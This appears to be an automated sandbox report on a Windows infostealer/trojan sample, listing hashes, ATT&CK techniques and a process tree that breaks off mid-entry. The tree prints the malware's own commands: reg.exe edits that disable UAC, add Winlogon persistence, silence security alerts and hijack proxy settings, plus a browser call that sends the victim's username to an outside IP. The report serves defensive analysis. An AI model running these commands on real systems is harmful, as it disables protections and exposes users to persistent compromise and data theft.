961d0f8fb326d6c85fc2367de318299d6ecaca04e7ea935d4cf95019b373da05

Analysis

max time kernel
135s
max time network
129s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
02/10/2024, 08:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

09c331740a041d45989bd0c4f435b950_JaffaCakes118.exe
Size

120KB
MD5

09c331740a041d45989bd0c4f435b950
SHA1

fec50f94d6617d867a5c0010ac5b607b6e375f0b
SHA256

961d0f8fb326d6c85fc2367de318299d6ecaca04e7ea935d4cf95019b373da05
SHA512

bdc5d5cd4c97933ff0c6b39457a5cc27ecdec2bae7ba70400fd7f0f7149a3003c30e4ab7c3b88304ea0ec5bed2e5537f20bf59de6f2bee4ca60b5a4bbf4f8e5c
SSDEEP

3072:OSB1Ed0h4MEHZB5TiVhf/rw9O8NMUEfyUWEA:OSB1Ed0h/CB5OVhc9OsvEs

Score

10^/10

discovery evasion persistence spyware stealer trojan upx

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\Users\\Admin\\AppData\\Local\\Temp\\crss.exe,"	reg.exe

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Windows security bypass 2 TTPs 3 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	reg.exe

Executes dropped EXE 1 IoCs

pid	Process
1864	jp.exe

Loads dropped DLL 2 IoCs

pid	Process
2588	09c331740a041d45989bd0c4f435b950_JaffaCakes118.exe
2588	09c331740a041d45989bd0c4f435b950_JaffaCakes118.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0008000000012117-9.dat	upx
behavioral1/memory/1864-10-0x0000000000400000-0x0000000000413000-memory.dmp	upx
behavioral1/memory/1864-57-0x0000000000400000-0x0000000000413000-memory.dmp	upx
behavioral1/memory/1864-62-0x0000000000400000-0x0000000000413000-memory.dmp	upx

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.policy	cmd.exe
File opened for modification	C:\Program Files\Java\jre7\lib\security\java.policy	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	09c331740a041d45989bd0c4f435b950_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fsutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000b3e8f15f634dfc43bfa5c3a2648d88c40000000002000000000010660000000100002000000069e2d529c981966caadacd24c849f831a9b84c1d4771b7493b788e82c432171e000000000e800000000200002000000003d67715d0f005d5e1f612725fcadb7cb39c82f5bdde0ce6acbec75a1c1feb2220000000b98564e6261488ac65831e5aa53e1c79279a0e556431cbc54c645c14fcd68edc4000000054eaf13fad54232b66535eb1168c10f693b5b5c3705e272af9770814d3bdf4525d316b23e7a9d499332f3a6d7d38661f6382ee2585c13a924d83e2e47f8c34b4	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{07DDD6D1-8098-11EF-81C1-5EE01BAFE073} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000b3e8f15f634dfc43bfa5c3a2648d88c4000000000200000000001066000000010000200000003307eb3b2adda719cdfc09e3ad8c0ac5ab9c236a08d1617d51f7c3083864f772000000000e8000000002000020000000ee424626a64a9073750e781219d4ae2ab5c374166ba4f0d7045d332f3f161ad8900000000324231c5b319887b0317da0363462479f83bfb1e1024f51f121ccecfe9cee025eb3e1298a3976b7ac41b96ea98245c6cf3628698b800fb947189089d2e61eabd7361020593c2c4d20194f9bcc017a4914e5cdb62747cd5cdc21dd4eebafa9cb38129b84f1d31a2722946bbc7d65dba6a0d717a1af966567de167049dea60b04ea56b468173c710f65f505969480ba3a40000000bad4b81e5865fd27a12bd78c4f8471bae86ca0bbdb9b2f1302ec79b76019c22f74f96dac1468a8e2932b02f50da8d4a5d35a0005e27c7b13c5ec6894db68d15a	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "434019461"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 405c26f7a414db01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2840	iexplore.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2840	iexplore.exe
2840	iexplore.exe
2612	IEXPLORE.EXE
2612	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2588 wrote to memory of 1864	2588	09c331740a041d45989bd0c4f435b950_JaffaCakes118.exe	30
PID 2588 wrote to memory of 1864	2588	09c331740a041d45989bd0c4f435b950_JaffaCakes118.exe	30
PID 2588 wrote to memory of 1864	2588	09c331740a041d45989bd0c4f435b950_JaffaCakes118.exe	30
PID 2588 wrote to memory of 1864	2588	09c331740a041d45989bd0c4f435b950_JaffaCakes118.exe	30
PID 2588 wrote to memory of 1864	2588	09c331740a041d45989bd0c4f435b950_JaffaCakes118.exe	30
PID 2588 wrote to memory of 1864	2588	09c331740a041d45989bd0c4f435b950_JaffaCakes118.exe	30
PID 2588 wrote to memory of 1864	2588	09c331740a041d45989bd0c4f435b950_JaffaCakes118.exe	30
PID 1864 wrote to memory of 2136	1864	jp.exe	31
PID 1864 wrote to memory of 2136	1864	jp.exe	31
PID 1864 wrote to memory of 2136	1864	jp.exe	31
PID 1864 wrote to memory of 2136	1864	jp.exe	31
PID 1864 wrote to memory of 2136	1864	jp.exe	31
PID 1864 wrote to memory of 2136	1864	jp.exe	31
PID 1864 wrote to memory of 2136	1864	jp.exe	31
PID 2136 wrote to memory of 2840	2136	cmd.exe	33
PID 2136 wrote to memory of 2840	2136	cmd.exe	33
PID 2136 wrote to memory of 2840	2136	cmd.exe	33
PID 2136 wrote to memory of 2840	2136	cmd.exe	33
PID 2136 wrote to memory of 2996	2136	cmd.exe	34
PID 2136 wrote to memory of 2996	2136	cmd.exe	34
PID 2136 wrote to memory of 2996	2136	cmd.exe	34
PID 2136 wrote to memory of 2996	2136	cmd.exe	34
PID 2136 wrote to memory of 2996	2136	cmd.exe	34
PID 2136 wrote to memory of 2996	2136	cmd.exe	34
PID 2136 wrote to memory of 2996	2136	cmd.exe	34
PID 2136 wrote to memory of 2776	2136	cmd.exe	35
PID 2136 wrote to memory of 2776	2136	cmd.exe	35
PID 2136 wrote to memory of 2776	2136	cmd.exe	35
PID 2136 wrote to memory of 2776	2136	cmd.exe	35
PID 2136 wrote to memory of 2776	2136	cmd.exe	35
PID 2136 wrote to memory of 2776	2136	cmd.exe	35
PID 2136 wrote to memory of 2776	2136	cmd.exe	35
PID 2136 wrote to memory of 2660	2136	cmd.exe	36
PID 2136 wrote to memory of 2660	2136	cmd.exe	36
PID 2136 wrote to memory of 2660	2136	cmd.exe	36
PID 2136 wrote to memory of 2660	2136	cmd.exe	36
PID 2136 wrote to memory of 2660	2136	cmd.exe	36
PID 2136 wrote to memory of 2660	2136	cmd.exe	36
PID 2136 wrote to memory of 2660	2136	cmd.exe	36
PID 2840 wrote to memory of 2612	2840	iexplore.exe	37
PID 2840 wrote to memory of 2612	2840	iexplore.exe	37
PID 2840 wrote to memory of 2612	2840	iexplore.exe	37
PID 2840 wrote to memory of 2612	2840	iexplore.exe	37
PID 2840 wrote to memory of 2612	2840	iexplore.exe	37
PID 2840 wrote to memory of 2612	2840	iexplore.exe	37
PID 2840 wrote to memory of 2612	2840	iexplore.exe	37
PID 2136 wrote to memory of 2608	2136	cmd.exe	38
PID 2136 wrote to memory of 2608	2136	cmd.exe	38
PID 2136 wrote to memory of 2608	2136	cmd.exe	38
PID 2136 wrote to memory of 2608	2136	cmd.exe	38
PID 2136 wrote to memory of 2608	2136	cmd.exe	38
PID 2136 wrote to memory of 2608	2136	cmd.exe	38
PID 2136 wrote to memory of 2608	2136	cmd.exe	38
PID 2136 wrote to memory of 2392	2136	cmd.exe	39
PID 2136 wrote to memory of 2392	2136	cmd.exe	39
PID 2136 wrote to memory of 2392	2136	cmd.exe	39
PID 2136 wrote to memory of 2392	2136	cmd.exe	39
PID 2136 wrote to memory of 2392	2136	cmd.exe	39
PID 2136 wrote to memory of 2392	2136	cmd.exe	39
PID 2136 wrote to memory of 2392	2136	cmd.exe	39
PID 2136 wrote to memory of 1508	2136	cmd.exe	40
PID 2136 wrote to memory of 1508	2136	cmd.exe	40
PID 2136 wrote to memory of 1508	2136	cmd.exe	40
PID 2136 wrote to memory of 1508	2136	cmd.exe	40

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
340	attrib.exe
1900	attrib.exe
1260	attrib.exe

C:\Users\Admin\AppData\Local\Temp\09c331740a041d45989bd0c4f435b950_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\09c331740a041d45989bd0c4f435b950_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2588
- C:\Users\Admin\AppData\Local\Temp\jp.exe
  "C:\Users\Admin\AppData\Local\Temp\jp.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1864
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\9B55.tmp\jp.bat" "
    3⤵
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2136
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" "http://176.31.114.92/e/j.php?a=Admin&b=CCJBVTGQ"
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2840
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2840 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2612
  - - C:\Windows\SysWOW64\fsutil.exe
      fsutil file createnew "C:\Users\Admin\AppData\Local\Temp\ok.db" 666"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2996
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      System Location Discovery: System Language Discovery
      PID:2776
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit" /t REG_SZ /d "C:\Windows\system32\userinit.exe,C:\Users\Admin\AppData\Local\Temp\crss.exe," /f
      4⤵
      Modifies WinLogon for persistence
      System Location Discovery: System Language Discovery
      PID:2660
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKLM\Software\Microsoft\Security Center" /v AntiVirusDisableNotify /t REG_DWORD /d 0x00000001 /f
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:2608
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKLM\Software\Microsoft\Security Center" /v FirewallDisableNotify /t REG_DWORD /d 0x00000001 /f
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:2392
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKLM\Software\Microsoft\Security Center" /v UpdatesDisableNotify /t REG_DWORD /d 0x00000001 /f
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:1508
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v DisableSR /t REG_DWORD /d 0x00000001 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2896
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:780
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AutoConfigUrl" /d "file://C:\Users\Admin\AppData\Local\Temp/CCJBVTGQ.txt" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1960
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1568
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "EnableHttp1_1" /t reg_dword /d 00000001 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2924
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1224
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyEnable" /t reg_dword /d 00000000 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1148
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1276
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyHttp1.1" /t reg_dword /d 00000000 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1396
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:760
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "AdvancedTab" /t reg_dword /d 00000001 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1956
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3004
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "ResetWebSettings" /t reg_dword /d 00000001 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:3040
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2904
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "Autoconfig" /t reg_dword /d 00000001 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2956
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3048
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AutoConfigUrl" /d "file://C:\Users\Admin\AppData\Local\Temp/CCJBVTGQ.txt" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:948
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1056
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "EnableHttp1_1" /t reg_dword /d 00000001 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1948
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1004
  - - C:\Windows\SysWOW64\reg.exe
